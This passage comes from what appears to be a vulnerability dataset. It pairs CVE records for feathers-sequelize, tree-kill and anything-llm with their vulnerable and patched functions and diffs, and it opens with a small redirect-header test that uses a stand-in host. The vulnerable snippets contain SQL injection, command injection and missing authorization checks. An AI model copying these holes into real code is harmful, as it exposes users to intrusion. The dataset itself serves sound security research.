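h = {"Cookie": "session=s3cr3t", "User-Agent": "demo"}
same = redirect_headers(h, "https://example.com/a", "https://example.com/b")
cross = redirect_headers(h, "https://example.com/a", "https://evil.example.net/")
assert "Cookie" in same and "Cookie" not in cross
```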
Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/feathersjs-ecosystem/feathers-sequelize", "patch_url": ["https://github.com/feathersjs-ecosystem/feathers-sequelize/commit/0f2d85f0b2d556f2b6c70423dcebdbd29d95e3dc"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_274_1", "commit": "4c536ccc58343fe5b283016d618ad8e7fd6a1c2c", "file_path": "lib/index.js", "start_line": 122, "end_line": 159, "snippet": " _find (params = {}) {\n const { filters, query: where, paginate } = this.filterQuery(params);\n const order = utils.getOrder(filters.$sort);\n\n const q = Object.assign({\n where,\n order,\n limit: filters.$limit,\n offset: filters.$skip,\n raw: this.raw,\n distinct: true\n }, params.sequelize);\n\n if (filters.$select) {\n q.attributes = filters.$select;\n }\n\n const Model = this.applyScope(params);\n\n // Until Sequelize fix all the findAndCount issues, a few 'hacks' are needed to get the total count correct\n\n // Adding an empty include changes the way the count is done\n // See: https://github.com/sequelize/sequelize/blob/7e441a6a5ca44749acd3567b59b1d6ceb06ae64b/lib/model.js#L1780-L1782\n q.include = q.include || [];\n\n if (paginate && paginate.default) {\n return Model.findAndCountAll(q).then(result => {\n return {\n total: result.count,\n limit: filters.$limit,\n skip: filters.$skip || 0,\n data: result.rows\n };\n }).catch(utils.errorHandler);\n }\n\n return Model.findAll(q).catch(utils.errorHandler);\n }"}], "fix_func": [{"id": "fix_js_274_1", "commit": "0f2d85f0b2d556f2b6c70423dcebdbd29d95e3dc", "file_path": "lib/index.js", "start_line": 122, "end_line": 159, "snippet": " _find (params = {}) {\n const { filters, query: where, paginate } = this.filterQuery(params);\n const order = utils.getOrder(filters.$sort);\n\n const q = Object.assign({\n where,\n order,\n limit: filters.$limit,\n offset: filters.$skip,\n raw: this.raw,\n distinct: true\n }, params.sequelize);\n\n if (filters.$select) {\n q.attributes = filters.$select.map(select => `${select}`);\n }\n\n const Model = this.applyScope(params);\n\n // Until Sequelize fix all the findAndCount issues, a few 'hacks' are needed to get the total count correct\n\n // Adding an empty include changes the way the count is done\n // See: https://github.com/sequelize/sequelize/blob/7e441a6a5ca44749acd3567b59b1d6ceb06ae64b/lib/model.js#L1780-L1782\n q.include = q.include || [];\n\n if (paginate && paginate.default) {\n return Model.findAndCountAll(q).then(result => {\n return {\n total: result.count,\n limit: filters.$limit,\n skip: filters.$skip || 0,\n data: result.rows\n };\n }).catch(utils.errorHandler);\n }\n\n return Model.findAll(q).catch(utils.errorHandler);\n }"}], "vul_patch": "--- a/lib/index.js\n+++ b/lib/index.js\n@@ -12,7 +12,7 @@\n }, params.sequelize);\n \n if (filters.$select) {\n- q.attributes = filters.$select;\n+ q.attributes = filters.$select.map(select => `${select}`);\n }\n \n const Model = this.applyScope(params);\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2019-15599", "cve_description": "A Code Injection exists in tree-kill on Windows which allows a remote code execution when an attacker is able to control the input into the command.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using 
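Aside on CVE-2022-2422 above: the one-line fix coerces each `$select` entry to a string, so structured values that Sequelize would otherwise interpret as raw SQL fragments degrade into harmless (and invalid) column names. A Python rendering of that defense, extended with an allow-list that goes beyond the upstream patch (column names hypothetical):

```python
# Sketch: neutralize structured "column" selections from a query string.
ALLOWED = {"id", "title", "artist"}  # hypothetical column allow-list

def safe_select(selects) -> list:
    cols = [str(s) for s in selects]           # coercion, as in the fix
    bad = [c for c in cols if c not in ALLOWED]
    if bad:                                    # extra belt-and-braces check
        raise ValueError(f"unknown columns: {bad}")
    return cols

print(safe_select(["id", "title"]))
# safe_select([["id", "(SELECT password FROM users)"]]) -> ValueError,
# because str() turns the nested list into one bogus column name.
```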
externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/pkrumins/node-tree-kill", "patch_url": ["https://github.com/pkrumins/node-tree-kill/commit/deee138a8cbc918463d8af5ce8c2bec33c3fd164"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_280_1", "commit": "ff73dbf144c4c2daa67799a50dfff59cd455c63c", "file_path": "index.js", "start_line": 7, "end_line": 46, "snippet": "module.exports = function (pid, signal, callback) {\n if (typeof pid !== \"number\") {\n throw new Error(\"pid must be a number\");\n }\n\n var tree = {};\n var pidsToProcess = {};\n tree[pid] = [];\n pidsToProcess[pid] = 1;\n \n if (typeof signal === 'function' && callback === undefined) {\n callback = signal;\n signal = undefined;\n }\n\n switch (process.platform) {\n case 'win32':\n exec('taskkill /pid ' + pid + ' /T /F', callback);\n break;\n case 'darwin':\n buildProcessTree(pid, tree, pidsToProcess, function (parentPid) {\n return spawn('pgrep', ['-P', parentPid]);\n }, function () {\n killAll(tree, signal, callback);\n });\n break;\n // case 'sunos':\n // buildProcessTreeSunOS(pid, tree, pidsToProcess, function () {\n // killAll(tree, signal, callback);\n // });\n // break;\n default: // Linux\n buildProcessTree(pid, tree, pidsToProcess, function (parentPid) {\n return spawn('ps', ['-o', 'pid', '--no-headers', '--ppid', parentPid]);\n }, function () {\n killAll(tree, signal, callback);\n });\n break;\n }\n};"}], "fix_func": [{"id": "fix_js_280_1", "commit": "deee138a8cbc918463d8af5ce8c2bec33c3fd164", "file_path": "index.js", "start_line": 7, "end_line": 51, "snippet": "module.exports = function (pid, signal, callback) {\n if (typeof signal === 'function' && callback === undefined) {\n callback = signal;\n signal = undefined;\n }\n\n pid = parseInt(pid);\n if (Number.isNaN(pid)) {\n if (callback) {\n return callback(new Error(\"pid must be a number\"));\n } else {\n throw new Error(\"pid must be a number\");\n }\n }\n\n var tree = {};\n var pidsToProcess = {};\n tree[pid] = [];\n pidsToProcess[pid] = 1;\n\n switch (process.platform) {\n case 'win32':\n exec('taskkill /pid ' + pid + ' /T /F', callback);\n break;\n case 'darwin':\n buildProcessTree(pid, tree, pidsToProcess, function (parentPid) {\n return spawn('pgrep', ['-P', parentPid]);\n }, function () {\n killAll(tree, signal, callback);\n });\n break;\n // case 'sunos':\n // buildProcessTreeSunOS(pid, tree, pidsToProcess, function () {\n // killAll(tree, signal, callback);\n // });\n // break;\n default: // Linux\n buildProcessTree(pid, tree, pidsToProcess, function (parentPid) {\n return spawn('ps', 
['-o', 'pid', '--no-headers', '--ppid', parentPid]);\n }, function () {\n killAll(tree, signal, callback);\n });\n break;\n }\n};"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -1,17 +1,22 @@\n module.exports = function (pid, signal, callback) {\n- if (typeof pid !== \"number\") {\n- throw new Error(\"pid must be a number\");\n+ if (typeof signal === 'function' && callback === undefined) {\n+ callback = signal;\n+ signal = undefined;\n+ }\n+\n+ pid = parseInt(pid);\n+ if (Number.isNaN(pid)) {\n+ if (callback) {\n+ return callback(new Error(\"pid must be a number\"));\n+ } else {\n+ throw new Error(\"pid must be a number\");\n+ }\n }\n \n var tree = {};\n var pidsToProcess = {};\n tree[pid] = [];\n pidsToProcess[pid] = 1;\n- \n- if (typeof signal === 'function' && callback === undefined) {\n- callback = signal;\n- signal = undefined;\n- }\n \n switch (process.platform) {\n case 'win32':\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-10109", "cve_description": "A vulnerability in the mintplex-labs/anything-llm repository, as of commit 5c40419, allows low privilege users to access the sensitive API endpoint \"/api/system/custom-models\". This access enables them to modify the model's API key and base path, leading to potential API key leakage and denial of service on chats.", "cwe_info": {"CWE-863": {"name": "Incorrect Authorization", "description": "The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check."}}, "repo": "https://github.com/mintplex-labs/anything-llm", "patch_url": ["https://github.com/mintplex-labs/anything-llm/commit/8d302c3f670c582b09d47e96132c248101447a11"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_265_1", "commit": "dd017c6cbbf42abdef7861a66558c53b66424d07", "file_path": "server/endpoints/system.js", "start_line": 60, "end_line": 1220, "snippet": "function systemEndpoints(app) {\n if (!app) return;\n\n app.get(\"/ping\", (_, response) => {\n response.status(200).json({ online: true });\n });\n\n app.get(\"/migrate\", async (_, response) => {\n response.sendStatus(200);\n });\n\n app.get(\"/env-dump\", async (_, response) => {\n if (process.env.NODE_ENV !== \"production\")\n return response.sendStatus(200).end();\n dumpENV();\n response.sendStatus(200).end();\n });\n\n app.get(\"/setup-complete\", async (_, response) => {\n try {\n const results = await SystemSettings.currentSettings();\n response.status(200).json({ results });\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n });\n\n app.get(\n \"/system/check-token\",\n [validatedRequest],\n async (request, response) => {\n try {\n if (multiUserMode(response)) {\n const user = await userFromSession(request, response);\n if (!user || user.suspended) {\n response.sendStatus(403).end();\n return;\n }\n\n response.sendStatus(200).end();\n return;\n }\n\n response.sendStatus(200).end();\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.post(\"/request-token\", async (request, response) => {\n try {\n const bcrypt = require(\"bcrypt\");\n\n if (await SystemSettings.isMultiUserMode()) {\n const { username, password } = reqBody(request);\n const existingUser = await User._get({ username: String(username) });\n\n if (!existingUser) {\n await EventLogs.logEvent(\n \"failed_login_invalid_username\",\n {\n ip: request.ip || \"Unknown IP\",\n username: username || \"Unknown user\",\n },\n 
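Aside on CVE-2019-15599 above: the fix gates the pid through `parseInt`/`isNaN` before it is spliced into the Windows `taskkill` command string. The equivalent gate in Python; note that Python's `int()` is stricter than JS `parseInt`, which truncates at the first non-digit, but either way no shell metacharacter survives (the positivity check is an extra guard beyond the upstream fix):

```python
# Sketch: integer-coerce a pid before it can reach a shell string.
def parse_pid(value) -> int:
    try:
        pid = int(value)
    except (TypeError, ValueError):
        raise ValueError("pid must be a number")
    if pid <= 0:  # extra guard, not in the upstream patch
        raise ValueError("pid must be a positive number")
    return pid

print(parse_pid("1234"))            # 1234
# parse_pid("1234 & shutdown /s")   # ValueError: pid must be a number
# Only after validation would it be safe to build:
#   f"taskkill /pid {pid} /T /F"
```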
existingUser?.id\n );\n response.status(200).json({\n user: null,\n valid: false,\n token: null,\n message: \"[001] Invalid login credentials.\",\n });\n return;\n }\n\n if (!bcrypt.compareSync(String(password), existingUser.password)) {\n await EventLogs.logEvent(\n \"failed_login_invalid_password\",\n {\n ip: request.ip || \"Unknown IP\",\n username: username || \"Unknown user\",\n },\n existingUser?.id\n );\n response.status(200).json({\n user: null,\n valid: false,\n token: null,\n message: \"[002] Invalid login credentials.\",\n });\n return;\n }\n\n if (existingUser.suspended) {\n await EventLogs.logEvent(\n \"failed_login_account_suspended\",\n {\n ip: request.ip || \"Unknown IP\",\n username: username || \"Unknown user\",\n },\n existingUser?.id\n );\n response.status(200).json({\n user: null,\n valid: false,\n token: null,\n message: \"[004] Account suspended by admin.\",\n });\n return;\n }\n\n await Telemetry.sendTelemetry(\n \"login_event\",\n { multiUserMode: false },\n existingUser?.id\n );\n\n await EventLogs.logEvent(\n \"login_event\",\n {\n ip: request.ip || \"Unknown IP\",\n username: existingUser.username || \"Unknown user\",\n },\n existingUser?.id\n );\n\n // Check if the user has seen the recovery codes\n if (!existingUser.seen_recovery_codes) {\n const plainTextCodes = await generateRecoveryCodes(existingUser.id);\n\n // Return recovery codes to frontend\n response.status(200).json({\n valid: true,\n user: User.filterFields(existingUser),\n token: makeJWT(\n { id: existingUser.id, username: existingUser.username },\n \"30d\"\n ),\n message: null,\n recoveryCodes: plainTextCodes,\n });\n return;\n }\n\n response.status(200).json({\n valid: true,\n user: User.filterFields(existingUser),\n token: makeJWT(\n { id: existingUser.id, username: existingUser.username },\n \"30d\"\n ),\n message: null,\n });\n return;\n } else {\n const { password } = reqBody(request);\n if (\n !bcrypt.compareSync(\n password,\n bcrypt.hashSync(process.env.AUTH_TOKEN, 10)\n )\n ) {\n await EventLogs.logEvent(\"failed_login_invalid_password\", {\n ip: request.ip || \"Unknown IP\",\n multiUserMode: false,\n });\n response.status(401).json({\n valid: false,\n token: null,\n message: \"[003] Invalid password provided\",\n });\n return;\n }\n\n await Telemetry.sendTelemetry(\"login_event\", { multiUserMode: false });\n await EventLogs.logEvent(\"login_event\", {\n ip: request.ip || \"Unknown IP\",\n multiUserMode: false,\n });\n response.status(200).json({\n valid: true,\n token: makeJWT(\n { p: new EncryptionManager().encrypt(password) },\n \"30d\"\n ),\n message: null,\n });\n }\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n });\n\n app.get(\n \"/request-token/sso/simple\",\n [simpleSSOEnabled],\n async (request, response) => {\n const { token: tempAuthToken } = request.query;\n const { sessionToken, token, error } =\n await TemporaryAuthToken.validate(tempAuthToken);\n\n if (error) {\n await EventLogs.logEvent(\"failed_login_invalid_temporary_auth_token\", {\n ip: request.ip || \"Unknown IP\",\n multiUserMode: true,\n });\n return response.status(401).json({\n valid: false,\n token: null,\n message: `[001] An error occurred while validating the token: ${error}`,\n });\n }\n\n await Telemetry.sendTelemetry(\n \"login_event\",\n { multiUserMode: true },\n token.user.id\n );\n await EventLogs.logEvent(\n \"login_event\",\n {\n ip: request.ip || \"Unknown IP\",\n username: token.user.username || \"Unknown user\",\n },\n token.user.id\n );\n\n 
response.status(200).json({\n valid: true,\n user: User.filterFields(token.user),\n token: sessionToken,\n message: null,\n });\n }\n );\n\n app.post(\n \"/system/recover-account\",\n [isMultiUserSetup],\n async (request, response) => {\n try {\n const { username, recoveryCodes } = reqBody(request);\n const { success, resetToken, error } = await recoverAccount(\n username,\n recoveryCodes\n );\n\n if (success) {\n response.status(200).json({ success, resetToken });\n } else {\n response.status(400).json({ success, message: error });\n }\n } catch (error) {\n console.error(\"Error recovering account:\", error);\n response\n .status(500)\n .json({ success: false, message: \"Internal server error\" });\n }\n }\n );\n\n app.post(\n \"/system/reset-password\",\n [isMultiUserSetup],\n async (request, response) => {\n try {\n const { token, newPassword, confirmPassword } = reqBody(request);\n const { success, message, error } = await resetPassword(\n token,\n newPassword,\n confirmPassword\n );\n\n if (success) {\n response.status(200).json({ success, message });\n } else {\n response.status(400).json({ success, error });\n }\n } catch (error) {\n console.error(\"Error resetting password:\", error);\n response.status(500).json({ success: false, message: error.message });\n }\n }\n );\n\n app.get(\n \"/system/system-vectors\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (request, response) => {\n try {\n const query = queryParams(request);\n const VectorDb = getVectorDbClass();\n const vectorCount = !!query.slug\n ? await VectorDb.namespaceCount(query.slug)\n : await VectorDb.totalVectors();\n response.status(200).json({ vectorCount });\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.delete(\n \"/system/remove-document\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (request, response) => {\n try {\n const { name } = reqBody(request);\n await purgeDocument(name);\n response.sendStatus(200).end();\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.delete(\n \"/system/remove-documents\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (request, response) => {\n try {\n const { names } = reqBody(request);\n for await (const name of names) await purgeDocument(name);\n response.sendStatus(200).end();\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.delete(\n \"/system/remove-folder\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (request, response) => {\n try {\n const { name } = reqBody(request);\n await purgeFolder(name);\n response.sendStatus(200).end();\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.get(\n \"/system/local-files\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (_, response) => {\n try {\n const localFiles = await viewLocalFiles();\n response.status(200).json({ localFiles });\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.get(\n \"/system/document-processing-status\",\n [validatedRequest],\n async (_, response) => {\n try {\n const online = await new CollectorApi().online();\n response.sendStatus(online ? 
200 : 503);\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.get(\n \"/system/accepted-document-types\",\n [validatedRequest],\n async (_, response) => {\n try {\n const types = await new CollectorApi().acceptedFileTypes();\n if (!types) {\n response.sendStatus(404).end();\n return;\n }\n\n response.status(200).json({ types });\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.post(\n \"/system/update-env\",\n [validatedRequest, flexUserRoleValid([ROLES.admin])],\n async (request, response) => {\n try {\n const body = reqBody(request);\n const { newValues, error } = await updateENV(\n body,\n false,\n response?.locals?.user?.id\n );\n response.status(200).json({ newValues, error });\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.post(\n \"/system/update-password\",\n [validatedRequest],\n async (request, response) => {\n try {\n // Cannot update password in multi - user mode.\n if (multiUserMode(response)) {\n response.sendStatus(401).end();\n return;\n }\n\n let error = null;\n const { usePassword, newPassword } = reqBody(request);\n if (!usePassword) {\n // Password is being disabled so directly unset everything to bypass validation.\n process.env.AUTH_TOKEN = \"\";\n process.env.JWT_SECRET = \"\";\n } else {\n error = await updateENV(\n {\n AuthToken: newPassword,\n JWTSecret: v4(),\n },\n true\n )?.error;\n }\n response.status(200).json({ success: !error, error });\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.post(\n \"/system/enable-multi-user\",\n [validatedRequest],\n async (request, response) => {\n try {\n if (response.locals.multiUserMode) {\n response.status(200).json({\n success: false,\n error: \"Multi-user mode is already enabled.\",\n });\n return;\n }\n\n const { username, password } = reqBody(request);\n const { user, error } = await User.create({\n username,\n password,\n role: ROLES.admin,\n });\n\n if (error || !user) {\n response.status(400).json({\n success: false,\n error: error || \"Failed to enable multi-user mode.\",\n });\n return;\n }\n\n await SystemSettings._updateSettings({\n multi_user_mode: true,\n });\n await BrowserExtensionApiKey.migrateApiKeysToMultiUser(user.id);\n\n await updateENV(\n {\n JWTSecret: process.env.JWT_SECRET || v4(),\n },\n true\n );\n await Telemetry.sendTelemetry(\"enabled_multi_user_mode\", {\n multiUserMode: true,\n });\n await EventLogs.logEvent(\"multi_user_mode_enabled\", {}, user?.id);\n response.status(200).json({ success: !!user, error });\n } catch (e) {\n await User.delete({});\n await SystemSettings._updateSettings({\n multi_user_mode: false,\n });\n\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.get(\"/system/multi-user-mode\", async (_, response) => {\n try {\n const multiUserMode = await SystemSettings.isMultiUserMode();\n response.status(200).json({ multiUserMode });\n } catch (e) {\n console.error(e.message, e);\n response.sendStatus(500).end();\n }\n });\n\n app.get(\"/system/logo\", async function (request, response) {\n try {\n const darkMode =\n !request?.query?.theme || request?.query?.theme === \"default\";\n const defaultFilename = getDefaultFilename(darkMode);\n const logoPath = await determineLogoFilepath(defaultFilename);\n const { found, buffer, size, mime } = fetchLogo(logoPath);\n\n if (!found) {\n response.sendStatus(204).end();\n return;\n }\n\n const 
currentLogoFilename = await SystemSettings.currentLogoFilename();\n response.writeHead(200, {\n \"Access-Control-Expose-Headers\":\n \"Content-Disposition,X-Is-Custom-Logo,Content-Type,Content-Length\",\n \"Content-Type\": mime || \"image/png\",\n \"Content-Disposition\": `attachment; filename=${path.basename(\n logoPath\n )}`,\n \"Content-Length\": size,\n \"X-Is-Custom-Logo\":\n currentLogoFilename !== null &&\n currentLogoFilename !== defaultFilename &&\n !isDefaultFilename(currentLogoFilename),\n });\n response.end(Buffer.from(buffer, \"base64\"));\n return;\n } catch (error) {\n console.error(\"Error processing the logo request:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n });\n\n app.get(\"/system/footer-data\", [validatedRequest], async (_, response) => {\n try {\n const footerData =\n (await SystemSettings.get({ label: \"footer_data\" }))?.value ??\n JSON.stringify([]);\n response.status(200).json({ footerData: footerData });\n } catch (error) {\n console.error(\"Error fetching footer data:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n });\n\n app.get(\"/system/support-email\", [validatedRequest], async (_, response) => {\n try {\n const supportEmail =\n (\n await SystemSettings.get({\n label: \"support_email\",\n })\n )?.value ?? null;\n response.status(200).json({ supportEmail: supportEmail });\n } catch (error) {\n console.error(\"Error fetching support email:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n });\n\n // No middleware protection in order to get this on the login page\n app.get(\"/system/custom-app-name\", async (_, response) => {\n try {\n const customAppName =\n (\n await SystemSettings.get({\n label: \"custom_app_name\",\n })\n )?.value ?? 
null;\n response.status(200).json({ customAppName: customAppName });\n } catch (error) {\n console.error(\"Error fetching custom app name:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n });\n\n app.get(\n \"/system/pfp/:id\",\n [validatedRequest, flexUserRoleValid([ROLES.all])],\n async function (request, response) {\n try {\n const { id } = request.params;\n if (response.locals?.user?.id !== Number(id))\n return response.sendStatus(204).end();\n\n const pfpPath = await determinePfpFilepath(id);\n if (!pfpPath) return response.sendStatus(204).end();\n\n const { found, buffer, size, mime } = fetchPfp(pfpPath);\n if (!found) return response.sendStatus(204).end();\n\n response.writeHead(200, {\n \"Content-Type\": mime || \"image/png\",\n \"Content-Disposition\": `attachment; filename=${path.basename(pfpPath)}`,\n \"Content-Length\": size,\n });\n response.end(Buffer.from(buffer, \"base64\"));\n return;\n } catch (error) {\n console.error(\"Error processing the logo request:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n }\n );\n\n app.post(\n \"/system/upload-pfp\",\n [validatedRequest, flexUserRoleValid([ROLES.all]), handlePfpUpload],\n async function (request, response) {\n try {\n const user = await userFromSession(request, response);\n const uploadedFileName = request.randomFileName;\n if (!uploadedFileName) {\n return response.status(400).json({ message: \"File upload failed.\" });\n }\n\n const userRecord = await User.get({ id: user.id });\n const oldPfpFilename = userRecord.pfpFilename;\n if (oldPfpFilename) {\n const storagePath = path.join(__dirname, \"../storage/assets/pfp\");\n const oldPfpPath = path.join(\n storagePath,\n normalizePath(userRecord.pfpFilename)\n );\n if (!isWithin(path.resolve(storagePath), path.resolve(oldPfpPath)))\n throw new Error(\"Invalid path name\");\n if (fs.existsSync(oldPfpPath)) fs.unlinkSync(oldPfpPath);\n }\n\n const { success, error } = await User.update(user.id, {\n pfpFilename: uploadedFileName,\n });\n\n return response.status(success ? 200 : 500).json({\n message: success\n ? \"Profile picture uploaded successfully.\"\n : error || \"Failed to update with new profile picture.\",\n });\n } catch (error) {\n console.error(\"Error processing the profile picture upload:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n }\n );\n\n app.delete(\n \"/system/remove-pfp\",\n [validatedRequest, flexUserRoleValid([ROLES.all])],\n async function (request, response) {\n try {\n const user = await userFromSession(request, response);\n const userRecord = await User.get({ id: user.id });\n const oldPfpFilename = userRecord.pfpFilename;\n\n if (oldPfpFilename) {\n const storagePath = path.join(__dirname, \"../storage/assets/pfp\");\n const oldPfpPath = path.join(\n storagePath,\n normalizePath(oldPfpFilename)\n );\n if (!isWithin(path.resolve(storagePath), path.resolve(oldPfpPath)))\n throw new Error(\"Invalid path name\");\n if (fs.existsSync(oldPfpPath)) fs.unlinkSync(oldPfpPath);\n }\n\n const { success, error } = await User.update(user.id, {\n pfpFilename: null,\n });\n\n return response.status(success ? 200 : 500).json({\n message: success\n ? 
\"Profile picture removed successfully.\"\n : error || \"Failed to remove profile picture.\",\n });\n } catch (error) {\n console.error(\"Error processing the profile picture removal:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n }\n );\n\n app.post(\n \"/system/upload-logo\",\n [\n validatedRequest,\n flexUserRoleValid([ROLES.admin, ROLES.manager]),\n handleAssetUpload,\n ],\n async (request, response) => {\n if (!request?.file || !request?.file.originalname) {\n return response.status(400).json({ message: \"No logo file provided.\" });\n }\n\n if (!validFilename(request.file.originalname)) {\n return response.status(400).json({\n message: \"Invalid file name. Please choose a different file.\",\n });\n }\n\n try {\n const newFilename = await renameLogoFile(request.file.originalname);\n const existingLogoFilename = await SystemSettings.currentLogoFilename();\n await removeCustomLogo(existingLogoFilename);\n\n const { success, error } = await SystemSettings._updateSettings({\n logo_filename: newFilename,\n });\n\n return response.status(success ? 200 : 500).json({\n message: success\n ? \"Logo uploaded successfully.\"\n : error || \"Failed to update with new logo.\",\n });\n } catch (error) {\n console.error(\"Error processing the logo upload:\", error);\n response.status(500).json({ message: \"Error uploading the logo.\" });\n }\n }\n );\n\n app.get(\"/system/is-default-logo\", async (_, response) => {\n try {\n const currentLogoFilename = await SystemSettings.currentLogoFilename();\n const isDefaultLogo = currentLogoFilename === LOGO_FILENAME;\n response.status(200).json({ isDefaultLogo });\n } catch (error) {\n console.error(\"Error processing the logo request:\", error);\n response.status(500).json({ message: \"Internal server error\" });\n }\n });\n\n app.get(\n \"/system/remove-logo\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (_request, response) => {\n try {\n const currentLogoFilename = await SystemSettings.currentLogoFilename();\n await removeCustomLogo(currentLogoFilename);\n const { success, error } = await SystemSettings._updateSettings({\n logo_filename: LOGO_FILENAME,\n });\n\n return response.status(success ? 200 : 500).json({\n message: success\n ? \"Logo removed successfully.\"\n : error || \"Failed to update with new logo.\",\n });\n } catch (error) {\n console.error(\"Error processing the logo removal:\", error);\n response.status(500).json({ message: \"Error removing the logo.\" });\n }\n }\n );\n\n app.get(\n \"/system/welcome-messages\",\n [validatedRequest, flexUserRoleValid([ROLES.all])],\n async function (_, response) {\n try {\n const welcomeMessages = await WelcomeMessages.getMessages();\n response.status(200).json({ success: true, welcomeMessages });\n } catch (error) {\n console.error(\"Error fetching welcome messages:\", error);\n response\n .status(500)\n .json({ success: false, message: \"Internal server error\" });\n }\n }\n );\n\n app.post(\n \"/system/set-welcome-messages\",\n [validatedRequest, flexUserRoleValid([ROLES.admin, ROLES.manager])],\n async (request, response) => {\n try {\n const { messages = [] } = reqBody(request);\n if (!Array.isArray(messages)) {\n return response.status(400).json({\n success: false,\n message: \"Invalid message format. 
Expected an array of messages.\",\n });\n }\n\n await WelcomeMessages.saveAll(messages);\n return response.status(200).json({\n success: true,\n message: \"Welcome messages saved successfully.\",\n });\n } catch (error) {\n console.error(\"Error processing the welcome messages:\", error);\n response.status(500).json({\n success: true,\n message: \"Error saving the welcome messages.\",\n });\n }\n }\n );\n\n app.get(\"/system/api-keys\", [validatedRequest], async (_, response) => {\n try {\n if (response.locals.multiUserMode) {\n return response.sendStatus(401).end();\n }\n\n const apiKeys = await ApiKey.where({});\n return response.status(200).json({\n apiKeys,\n error: null,\n });\n } catch (error) {\n console.error(error);\n response.status(500).json({\n apiKey: null,\n error: \"Could not find an API Key.\",\n });\n }\n });\n\n app.post(\n \"/system/generate-api-key\",\n [validatedRequest],\n async (_, response) => {\n try {\n if (response.locals.multiUserMode) {\n return response.sendStatus(401).end();\n }\n\n const { apiKey, error } = await ApiKey.create();\n await Telemetry.sendTelemetry(\"api_key_created\");\n await EventLogs.logEvent(\n \"api_key_created\",\n {},\n response?.locals?.user?.id\n );\n return response.status(200).json({\n apiKey,\n error,\n });\n } catch (error) {\n console.error(error);\n response.status(500).json({\n apiKey: null,\n error: \"Error generating api key.\",\n });\n }\n }\n );\n\n app.delete(\"/system/api-key\", [validatedRequest], async (_, response) => {\n try {\n if (response.locals.multiUserMode) {\n return response.sendStatus(401).end();\n }\n\n await ApiKey.delete();\n await EventLogs.logEvent(\n \"api_key_deleted\",\n { deletedBy: response.locals?.user?.username },\n response?.locals?.user?.id\n );\n return response.status(200).end();\n } catch (error) {\n console.error(error);\n response.status(500).end();\n }\n });\n\n app.post(\n \"/system/custom-models\",\n [validatedRequest],\n async (request, response) => {\n try {\n const { provider, apiKey = null, basePath = null } = reqBody(request);\n const { models, error } = await getCustomModels(\n provider,\n apiKey,\n basePath\n );\n return response.status(200).json({\n models,\n error,\n });\n } catch (error) {\n console.error(error);\n response.status(500).end();\n }\n }\n );\n\n app.post(\n \"/system/event-logs\",\n [validatedRequest, flexUserRoleValid([ROLES.admin])],\n async (request, response) => {\n try {\n const { offset = 0, limit = 10 } = reqBody(request);\n const logs = await EventLogs.whereWithData({}, limit, offset * limit, {\n id: \"desc\",\n });\n const totalLogs = await EventLogs.count();\n const hasPages = totalLogs > (offset + 1) * limit;\n\n response.status(200).json({ logs: logs, hasPages, totalLogs });\n } catch (e) {\n console.error(e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.delete(\n \"/system/event-logs\",\n [validatedRequest, flexUserRoleValid([ROLES.admin])],\n async (_, response) => {\n try {\n await EventLogs.delete();\n await EventLogs.logEvent(\n \"event_logs_cleared\",\n {},\n response?.locals?.user?.id\n );\n response.json({ success: true });\n } catch (e) {\n console.error(e);\n response.sendStatus(500).end();\n }\n }\n );\n\n app.post(\n \"/system/workspace-chats\",\n [\n 